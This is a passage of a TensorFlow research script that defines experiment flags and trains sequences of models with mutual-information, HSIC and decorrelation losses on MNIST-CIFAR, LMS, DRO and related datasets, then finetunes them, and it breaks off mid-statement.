flags.DEFINE_bool('use_exp_var_loss', False, 'Use explained away variance as loss')
flags.DEFINE_bool('use_MI_loss', False, 'Use MI based loss function')
flags.DEFINE_integer('CIFAR_label_1', 1, 'CIFAR class 1 for MNIST-CIFAR dataset')
flags.DEFINE_integer('CIFAR_label_2', 9, 'CIFAR class 2 for MNIST-CIFAR dataset')
flags.DEFINE_integer('MNIST_label_1', 0, 'MNIST class 1 for MNIST-CIFAR dataset')
flags.DEFINE_integer('MNIST_label_2', 1, 'MNIST class 2 for MNIST-CIFAR dataset')
flags.DEFINE_float('corr_frac', 1.0, 'Correlation factor of MNIST and CIFAR for MNIST-CIFAR dataset')
flags.DEFINE_bool('use_proj_head', True, 'Use a projection head in the model')
flags.DEFINE_bool('normalize_MI', False, 'Normalize MI based loss')
flags.DEFINE_bool('use_logit_decorr', False, 'Use logit decorrelation')
flags.DEFINE_bool('use_prob_decorr', False, 'Use probability decorrelation')
flags.DEFINE_bool('use_val_for_MI', False, 'Use validation set for MI based loss')
flags.DEFINE_bool('use_cifar_aug', False, 'Use CIFAR augmentation in MNIST-CIFAR dataset')
flags.DEFINE_bool('use_mnist_aug', False, 'Use MNIST augmentation in MNIST-CIFAR dataset')
flags.DEFINE_integer('num_classes', 10, 'Number of classes')
flags.DEFINE_bool('monitor_rr_grad_norms', False, 'Monitor rr gradient norms')
flags.DEFINE_float('use_rr_after_frac', 0.0, 'Use rr after a fraction of steps')
flags.DEFINE_bool('use_sq_MI', False, 'Use squared MI as loss instead of MI, for better gradients')
flags.DEFINE_bool('use_disagr_loss', False, 'use disagreement based loss')
flags.DEFINE_bool('normalize_MI_random', False, 'normalize MI by randomly shuffling probabilities')
flags.DEFINE_bool('use_num_sq_MI', False, 'Use the MI loss of the form (MI^2)/y so as to get properly scaled gradients')
flags.DEFINE_bool('use_stop_grad', False, 'Use stop gradient for MI normalization factor')
flags.DEFINE_bool('use_HSIC_loss', False, 'Use HSIC based independence test loss')
flags.DEFINE_bool('use_HSIC_diff', False, 'Use HSIC on logit difference')
flags.DEFINE_bool('lin_scale_rr_weight', False, 'Linearly scale down rr weight as number of sequential models goes up')
flags.DEFINE_integer('dataset_dim', 2, 'Dimension of LMS dataset')
flags.DEFINE_integer('num_lin', 1, 'Number of linear dimensions')
flags.DEFINE_integer('num_3_slabs', 1, 'Number of 3 slabs')
flags.DEFINE_integer('num_5_slabs', 0, 'Number of 5 slabs')
flags.DEFINE_integer('num_7_slabs', 0, 'Number of 7 slabs')
flags.DEFINE_bool('use_random_transform', False, 'Use random transformation of input coordinates')
flags.DEFINE_float('lin_margin', 0.1, 'Linear coordinate margin')
flags.DEFINE_float('slab_margin', 0.05, 'Slab coordinate margin')
flags.DEFINE_integer('fcn_layers', 3, 'Number of layers in FCN net for lms dataset')
flags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension for FCN')
flags.DEFINE_bool('randomize_linear', False, 'Randomize linear coordinate in the dataset')
flags.DEFINE_bool('randomize_slabs', False, 'Randomize slab coordinates in the dataset')
flags.DEFINE_bool('turn_off_randomize_later', False, 'Turn off coordinate randomization later')
flags.DEFINE_bool('use_L4_reg', False, 'Use L4 instead of L2 regularization')
flags.DEFINE_bool('use_bn', True, 'Use BN in architecture')
flags.DEFINE_bool('use_HSIC_on_features', False, 'Use HSIC based loss on feature layers')
flags.DEFINE_integer('HSIC_feature_layer', 0, 'Feature layer to use HSIC loss on')
flags.DEFINE_multi_integer('HSIC_feature_layers', None, 'Feature layers to use HSIC loss on')
flags.DEFINE_bool('use_all_features_HSIC', False, 'Use features at all the layers for HSIC loss')
flags.DEFINE_bool('use_sq_HSIC', False, 'Square HSIC loss to manage gradients as loss goes down')
flags.DEFINE_bool('use_GAP_HSIC_features', True, 'Use GAP on HSIC features')
flags.DEFINE_bool('use_random_projections', False, 'Use random projections')
flags.DEFINE_integer('random_proj_dim', 1, 'Random projection dimension')
flags.DEFINE_bool('use_prev_logits_HSIC_features', False, 'Use logits of previous models for computing HSIC on features')
flags.DEFINE_bool('use_MNIST_labels', False, 'Use MNIST labels in MNIST-CIFAR')
flags.DEFINE_bool('switch_corr_later', False, 'Change correlation after first model')
flags.DEFINE_bool('switch_labels_later', False, 'Switch whether to use CIFAR or MNIST labels after first model')
flags.DEFINE_bool('monitor_EG_overlap', False, 'Monitor expected gradients overlap across models')
flags.DEFINE_bool('monitor_robustness_measures', False, 'Monitor Gaussian, mask and RDE based robustness measures')
flags.DEFINE_bool('monitor_error_diversity', False, 'Monitor error diversity')
flags.DEFINE_bool('monitor_logit_correlation', False, 'Monitor logit correlation')
flags.DEFINE_bool('sep_short_direct_branch', False, 'Separately make shortcut and direct branch independent of previous model')
flags.DEFINE_bool('use_pretrained_model_1', False, 'Utilise a pretrained first model.')
flags.DEFINE_string('pretrained_model_path', None, 'Path for first pretrained model')
flags.DEFINE_multi_string('pretrained_model_paths', None, 'Paths for pretrained models')
flags.DEFINE_multi_string('pretrained_checkpoint_paths', None, 'Paths for pretrained checkpoints')
flags.DEFINE_bool('use_indexed_checkpoints', False, 'Use particular checkpoint index')
flags.DEFINE_bool('check_tf_func', False, 'Check tf func')
flags.DEFINE_bool('use_FCN', False, 'Use FCN architecture')
flags.DEFINE_bool('monitor_EG_loss', False, 'Monitor EG loss')
flags.DEFINE_bool('use_equal_split', False, 'Use equal split for DRO setting')
flags.DEFINE_bool('use_EG_loss', False, 'Use expected gradients loss for avoiding collapse')
flags.DEFINE_integer('num_ref_EG_loss', 2, 'Number of referneces in EG loss')
flags.DEFINE_float('EG_loss_weight', 1e-3, 'Weight of EG loss')
flags.DEFINE_bool('binary_classification', False, 'Use binary classification and logistic loss')
flags.DEFINE_bool('use_color_labels', False, 'Use colors for label in color-MNIST or binary-color-MNIST')
flags.DEFINE_bool('use_CNN', False, 'Use custom CNN architecture')
flags.DEFINE_bool('use_HSIC_ratio', False, 'Use HSIC ratio as the loss')
flags.DEFINE_string(
'master', 'local',
"BNS name of the TensorFlow master to use. 'local' for GPU.")
flags.DEFINE_integer('project_out_rank', 0, 'Projecting certain dimensions out of input')
flags.DEFINE_float('project_out_factor', 0.0, 'Projecting out factor')
flags.DEFINE_float('eig_cutoff_factor', 0.0, 'Eigenvalue cutoff factor')
flags.DEFINE_integer('check_ranks_max', 10, 'Check rank of 1st hidden matrix')
flags.DEFINE_multi_integer('filters', [16, 32, 64], 'Filters to be used in a CNN')
flags.DEFINE_multi_integer('kernel_sizes', [3, 3, 3], 'kernel sizes to be used in a CNN')
flags.DEFINE_multi_integer('strides', [1, 2, 1], 'Strides to be used in a CNN')
flags.DEFINE_multi_integer('project_out_vecs', [1,2], 'Number of top SVD vectors to project out')
flags.DEFINE_bool('use_chizat_init', False, 'Whether to use chizat-bach initialization in head')
flags.DEFINE_bool('project_out_w', False, 'Project out w from representations')
flags.DEFINE_bool('use_complete_corr', False, 'Use complete correlation in DRO setting')
flags.DEFINE_bool('use_complete_corr_test', False, 'Use complete correlation in DRO setting')
flags.DEFINE_bool('flip_err_div_for_minority', False, 'Flip error diversity calc for minority classes')
flags.DEFINE_bool('measure_feat_robust', False, 'Measure robustness of features')
flags.DEFINE_float('max_gauss_noise_std', 5.0, 'Maximum gaussian noise std')
flags.DEFINE_boolean('use_tpu', True, 'Should we use TPU?')
flags.DEFINE_bool('check_torch_reps', False, 'Check torch reps')
flags.DEFINE_boolean(
'train_split', 1,
'Use train validation split while training, If set to false, use entire training dataset'
)
flags.DEFINE_bool('finetune_only_linear_head', False, 'Finetune only linear head')
_FRAC_POISON = flags.DEFINE_float('frac_poison', 0.,
'Fraction of poisoned examples.')
_TASK_ID = flags.DEFINE_enum('task_id', 'DRO', [
'Data-poisoning', 'DRO', 'Few-shot', 'CIFAR-10.2', 'CIFAR-10.2-finetune',
'CINIC', 'CINIC-finetune'
], 'Specify the task that needs to be run.')
_FINETUNE_ONLY_HEAD = flags.DEFINE_bool(
'finetune_only_head', False, 'whether to finetune head or the entire model')
_TRAIN_CLASSES = flags.DEFINE_multi_integer(
'train_classes', [0, 1, 2, 3, 4], 'classes to train for few-shot learning')
_FINETUNE_CLASSES = flags.DEFINE_multi_integer(
'finetune_classes', [5, 6, 7, 8, 9],
'classes to finetune for few-shot learning')
TASK_STAGES = {
'Data-poisoning': ['Train'],
'DRO': ['Train'],
'Few-shot': ['Train', 'Finetune'],
'CIFAR-10.2': ['Train'],
'CIFAR-10.2-finetune': ['Train'],
'CINIC': ['Train'],
'CINIC-finetune': ['Train'],
'CIFAR-MNIST': ['Train'],
'LMS': ['Train'],
'MNIST': ['Train'],
'color-MNIST': ['Train'],
'Imagenette': ['Train'],
}
def createmodel(num_classes,
head_dim,
head_layers,
proj_dim,
proj_layer,
use_proj=True,
resnet_base=None,
dropout_rate=0.0,
num_heads=1):
"""Create a model with resnet base and a linear head."""
if resnet_base is None:
resnet_base = resnet.resnet(
resnet_depth=FLAGS.resnet_depth,
width_multiplier=FLAGS.width_multiplier,
cifar_stem=FLAGS.image_size <= 32)
# model = tf.keras.models.Sequential()
# model.add(resnet_base)
# if use_dropout:
# model.add(tf.keras.layers.Dropout(rate=dropout_rate))
# Removed sigmoid activation as need logits
# model.add(tf.keras.layers.Dense(num_classes))
if num_heads > 1:
model = multihead_model(
resnet_base,
num_classes,
proj_dim,
proj_layer,
head_dim + np.zeros(head_layers),
num_heads,
use_proj=use_proj,
dropout_rate=dropout_rate)
else:
model = head_model(
resnet_base,
num_classes,
proj_dim,
proj_layer,
head_dim + np.zeros(head_layers),
use_proj = use_proj,
dropout_rate=dropout_rate,
use_bn=FLAGS.use_bn)
return model
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
logging.info(tf.__version__)
tf.config.set_soft_device_placement(True)
logging.info('Successfully entered')
# Setup the execution strategy
if FLAGS.platform == 'GPU':
strategy = tf.distribute.MirroredStrategy()
# strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy()
elif FLAGS.platform == 'TPU':
# Setup and connect to TPU cluster
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=FLAGS.master)
tf.config.experimental_connect_to_cluster(resolver)
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.experimental.TPUStrategy(resolver)
else:
raise ValueError('Unknown platform {}'.format(FLAGS.platform))
logging.set_verbosity(logging.INFO)
logging.info('Learning rate = %f, Batch size = %d', FLAGS.learning_rate,
FLAGS.train_batch_size)
adjust = 0
if FLAGS.use_pretrained_model_1:
adjust=FLAGS.num_seq_models - 1
# Hack to make val epochs gap equal to train epochs
if FLAGS.task_id in ['CIFAR-10.2', 'CIFAR-10.2-finetune', 'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'MNIST', 'color-MNIST', 'LMS']:
FLAGS.finetune_val_epochs_gap = FLAGS.train_epochs_finetune
FLAGS.finetune_val_steps_gap = FLAGS.train_steps_finetune
FLAGS.val_batch_size = FLAGS.train_batch_size
FLAGS.test_batch_size = FLAGS.train_batch_size
if FLAGS.binary_classification:
FLAGS.num_classes = 1
if FLAGS.proj_layer == -1:
FLAGS.proj_layer = FLAGS.num_head_layers
if FLAGS.turn_off_randomize_later and FLAGS.use_random_transform:
raise ValueError('Not supporting random transform and turn off randomize simultaneously as of now')
for stage in TASK_STAGES[_TASK_ID.value]:
if stage == 'Train':
logging.info('Loading training dataset.')
with strategy.scope():
MI_ds = None
W = None
if FLAGS.task_id == 'CIFAR-10.2' or FLAGS.task_id == 'CIFAR-10.2-finetune':
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
elif FLAGS.task_id in ['CINIC', 'CINIC-finetune', 'color-MNIST', 'CIFAR-MNIST']:
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
elif FLAGS.task_id == 'LMS':
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len, W = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
else:
ds_train, ds_val, ds_test, train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
logging.info('Successfully loaded training dataset')
vals_avg = []
vals_avg_2 = []
vals_avg_3 = []
vals_avg_4 = []
vals_std = []
vals_std_2 = []
vals_std_3 = []
vals_std_4 = []
temp1 = FLAGS.randomize_linear
temp2 = FLAGS.randomize_slabs
temp3 = FLAGS.corr_frac
temp4 = FLAGS.use_MNIST_labels
for run in range(FLAGS.num_runs):
if FLAGS.turn_off_randomize_later:
FLAGS.randomize_linear = temp1
FLAGS.randomize_slabs = temp2
with strategy.scope():
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len, W = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
if FLAGS.switch_corr_later or FLAGS.switch_labels_later:
if FLAGS.switch_corr_later:
FLAGS.corr_frac = temp3
if FLAGS.switch_labels_later:
FLAGS.use_MNIST_labels = temp4
with strategy.scope():
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
models = []
for model_seq in range(FLAGS.num_seq_models):
with strategy.scope():
if model_seq == 1 and FLAGS.turn_off_randomize_later:
FLAGS.randomize_linear = False
FLAGS.randomize_slabs = False
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len, W = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
if model_seq == 1 and (FLAGS.switch_corr_later or FLAGS.switch_labels_later):
if FLAGS.switch_corr_later:
FLAGS.corr_frac = 1.0
if FLAGS.switch_labels_later:
FLAGS.use_MNIST_labels = not(temp4)
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
if FLAGS.task_id == 'DRO' or FLAGS.task_id == 'Imagenette':
if FLAGS.use_pretrained:
# tmp_filepath = '/tmp/weights_resnet50.h5'
# tf.io.gfile.copy('/cns/sa-d/home/mloa/models/waterbirds/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', tmp_filepath, overwrite=True)
if FLAGS.check_torch_reps:
base_model = tf.keras.Sequential()
base_model.add(tf.keras.layers.Layer())
else:
if model_seq==0:
base_model = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights='imagenet', pooling='avg')
# tf.io.gfile.remove(tmp_filepath)
else:
if FLAGS.resnet_depth == 50:
base_model = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights=None, pooling='avg')
else:
base_model = resnet.resnet(
resnet_depth=FLAGS.resnet_depth,
width_multiplier=FLAGS.width_multiplier,
cifar_stem=False)
#layer_names = ['input_1', 'pool1_pool', 'conv2_block3_out', 'conv3_block4_out', 'conv4_block6_out', 'avg_pool']
#layers = [base_model.get_layer(x).output for x in layer_names]
#base_model = tf.keras.Model(base_model.input, outputs=layers)
model = createmodel(
FLAGS.num_classes,
FLAGS.head_dim,
FLAGS.num_head_layers,
FLAGS.proj_dim,
FLAGS.proj_layer,
resnet_base=base_model,
dropout_rate=FLAGS.dropout_rate,
num_heads=FLAGS.num_heads,
use_proj=FLAGS.use_proj_head)
elif FLAGS.task_id in ['CIFAR-10.2', 'CIFAR-10.2-finetune', 'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'MNIST', 'color-MNIST']:
if FLAGS.use_pretrained:
if model_seq == 0:
resnet_base = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights='imagenet', pooling='avg')
elif FLAGS.use_FCN:
hid_dims = FLAGS.hidden_dim + np.zeros(FLAGS.fcn_layers)
resnet_base = FCN_backbone(hid_dims)
elif FLAGS.use_CNN:
resnet_base = CNN_backbone(filters = FLAGS.filters, kernel_sizes=FLAGS.kernel_sizes,
strides=FLAGS.strides)
else:
resnet_base = None
model = createmodel(
FLAGS.num_classes,
FLAGS.head_dim,
FLAGS.num_head_layers,
FLAGS.proj_dim,
FLAGS.proj_layer,
resnet_base=resnet_base,
dropout_rate=FLAGS.dropout_rate,
num_heads=FLAGS.num_heads,
use_proj=FLAGS.use_proj_head)
elif FLAGS.task_id == 'LMS':
if FLAGS.use_pretrained:
resnet_base = tf.keras.Sequential()
resnet_base.add(tf.keras.layers.Layer())
else:
hid_dims = FLAGS.hidden_dim + np.zeros(FLAGS.fcn_layers)
resnet_base = FCN_backbone(hid_dims, use_bn=FLAGS.use_bn)
model = createmodel(
FLAGS.num_classes,
FLAGS.head_dim,
FLAGS.num_head_layers,
FLAGS.proj_dim,
FLAGS.proj_layer,
resnet_base=resnet_base,
dropout_rate=FLAGS.dropout_rate,
num_heads=FLAGS.num_heads,
use_proj=FLAGS.use_proj_head)
else:
model = createmodel(
len(_TRAIN_CLASSES.value),
512,
0,
512,
0,
resnet_base=None,
use_proj=False,
dropout_rate=FLAGS.dropout_rate)
if FLAGS.use_pretrained_model_1 and model_seq<FLAGS.num_seq_models-1:
if FLAGS.finetune_only_head:
save_vars = {}
for i in range(len(model.layers)):
if i != 0:
save_vars['model{}'.format(str(i))] = model.layers[i]
ckpt = tf.train.Checkpoint(**save_vars)
else:
ckpt = tf.train.Checkpoint(model=model)
checkpoint_manager = tf.train.CheckpointManager(
ckpt, directory=FLAGS.pretrained_model_paths[model_seq], max_to_keep=1)
logging.info('Loading model')
logging.info(checkpoint_manager.checkpoints)
if FLAGS.use_indexed_checkpoints:
latest_ckpt = FLAGS.pretrained_checkpoint_paths[model_seq]
else:
latest_ckpt = checkpoint_manager.latest_checkpoint
logging.info(latest_ckpt)
if latest_ckpt:
logging.info('Found checkpoint')
ckpt.restore(latest_ckpt).expect_partial()
models.append(model)
continue
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(FLAGS.train_epochs // FLAGS.lr_decay_gap, dtype=int) +
1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay':
if FLAGS.train_steps > 0:
decay_steps = FLAGS.train_steps
else:
decay_steps = FLAGS.train_epochs * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
elif FLAGS.lr_decay_type == 'warmup_cosine_decay':
lr_sched = WarmUpAndCosineDecay(FLAGS.learning_rate, train_len)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
if FLAGS.project_out_rank > 0:
optimizer2 = tf.keras.optimizers.Adam(learning_rate=lr_sched)
else:
optimizer2 = None
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
if FLAGS.project_out_rank > 0:
optimizer2 = tf.keras.optimizers.SGD(learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
optimizer2 = None
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
logging.info('Starting training')
epoch = tf.Variable(0)
if FLAGS.finetune_only_head:
save_vars = {}
save_vars['optimizer'] = optimizer
save_vars['epoch'] = epoch
for i in range(len(model.layers)):
if i != 0:
save_vars['model{}'.format(str(i))] = model.layers[i]
ckpt = tf.train.Checkpoint(**save_vars)
else:
ckpt = tf.train.Checkpoint(
model=model, optimizer=optimizer, epoch=epoch)
checkpoint_manager = tf.train.CheckpointManager(
ckpt,
directory='{}{}/{}/'.format(FLAGS.model_dir, str(run), str(model_seq)),
max_to_keep=100)
if FLAGS.load_model:
logging.info('Loading model')
latest_ckpt = checkpoint_manager.latest_checkpoint
if latest_ckpt:
logging.info('Found checkpoint')
ckpt.restore(latest_ckpt).expect_partial()
if FLAGS.task_id in ['CIFAR-10.2', 'CIFAR-10.2-finetune', 'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'LMS', 'color-MNIST']:
model, vals = train(
model,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
extra_dsets=[ds_OOD_test],
num_heads=FLAGS.num_heads,
ckpt_manager=checkpoint_manager,
prev_models=models,
MI_ds = MI_ds,
optimizer2 = optimizer2,
W = W,
only_head=FLAGS.finetune_only_head,
only_linear_head=FLAGS.finetune_only_linear_head)
elif FLAGS.task_id == 'DRO' or FLAGS.task_id == 'Imagenette':
model, vals = train(
model,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
only_head=FLAGS.finetune_only_head,
ckpt_manager=checkpoint_manager,
prev_models=models,
only_linear_head=FLAGS.finetune_only_linear_head)
else:
model, vals = train(
model,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
ckpt_manager=checkpoint_manager,
prev_models=models)
models.append(model)
if run == 0:
vals_avg.append(vals)
else:
vals_avg[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run / (run + 1.0)) * vals_avg[model_seq-adjust]
if run == 0:
vals_std.append(vals**2)
else:
vals_std[model_seq-adjust] = (1.0 / (run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std[model_seq-adjust]
logging.info('Finished training')
if FLAGS.task_id in ['CIFAR-10.2-finetune', 'CINIC-finetune', 'CIFAR-MNIST', 'color-MNIST', 'LMS']:
with strategy.scope():
if FLAGS.use_pretrained:
base_model = models[0].layers[0]
head_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
if layer_ind > 0:
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
head_models.append(curr_model)
model1 = base_multi_head_model(base_model=base_model, head_models=head_models, num_classes=FLAGS.num_classes)
else:
temp_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
temp_models.append(curr_model)
model1 = multi_base_model(temp_models, FLAGS.num_classes)
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(
FLAGS.train_epochs_finetune // FLAGS.lr_decay_gap,
dtype=int) + 1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay' or FLAGS.lr_decay_type == 'warmup_cosine_decay':
if FLAGS.train_steps_finetune > 0:
decay_steps = FLAGS.train_steps_finetune
else:
decay_steps = FLAGS.train_epochs_finetune * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
model1, vals = train(
model1,
ds_OOD_train,
ds_OOD_val,
ds_OOD_test,
OOD_train_len,
optimizer,
run=run,
only_head=True,
only_linear_head=True,
finetune=True,
prefix='OOD_finetune_{}_'.format(model_seq))
if run == 0:
vals_avg_2.append(vals)
else:
vals_avg_2[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run /
(run + 1.0)) * vals_avg_2[model_seq-adjust]
if run == 0:
vals_std_2.append(vals**2)
else:
vals_std_2[model_seq-adjust] = (1.0 /
(run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std_2[model_seq-adjust]
logging.info('Finished finetuning')
if FLAGS.monitor_robustness_measures:
with strategy.scope():
if FLAGS.use_pretrained:
base_model = models[0].layers[0]
head_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
if layer_ind > 0:
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
head_models.append(curr_model)
model1 = base_multi_head_model(base_model=base_model, head_models=head_models, num_classes=FLAGS.num_classes)
else:
temp_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
temp_models.append(curr_model)
model1 = multi_base_model(temp_models, FLAGS.num_classes)
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(
FLAGS.train_epochs_finetune // FLAGS.lr_decay_gap,
dtype=int) + 1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay' or FLAGS.lr_decay_type == 'warmup_cosine_decay':
if FLAGS.train_steps_finetune > 0:
decay_steps = FLAGS.train_steps_finetune
else:
decay_steps = FLAGS.train_epochs_finetune * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
model1, vals = train(
model1,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
only_head=True,
only_linear_head=True,
finetune=True,
prefix='non_gauss_finetune_{}_'.format(model_seq))
if run == 0:
vals_avg_3.append(vals)
else:
vals_avg_3[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run /
(run + 1.0)) * vals_avg_3[model_seq-adjust]
if run == 0:
vals_std_3.append(vals**2)
else:
vals_std_3[model_seq-adjust] = (1.0 /
(run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std_3[model_seq-adjust]
if FLAGS.monitor_robustness_measures:
with strategy.scope():
if FLAGS.use_pretrained:
base_model = models[0].layers[0]
head_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
if layer_ind > 0:
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
head_models.append(curr_model)
model2 = base_multi_head_model(base_model=base_model, head_models=head_models, num_classes=FLAGS.num_classes)
else:
temp_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
temp_models.append(curr_model)
model2 = multi_base_model(temp_models, FLAGS.num_classes)
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(
FLAGS.train_epochs_finetune // FLAGS.lr_decay_gap,
dtype=int) + 1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay' or FLAGS.lr_decay_type == 'warmup_cosine_decay':
if FLAGS.train_steps_finetune > 0:
decay_steps = FLAGS.train_steps_finetune
else:
decay_steps = FLAGS.train_epochs_finetune * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
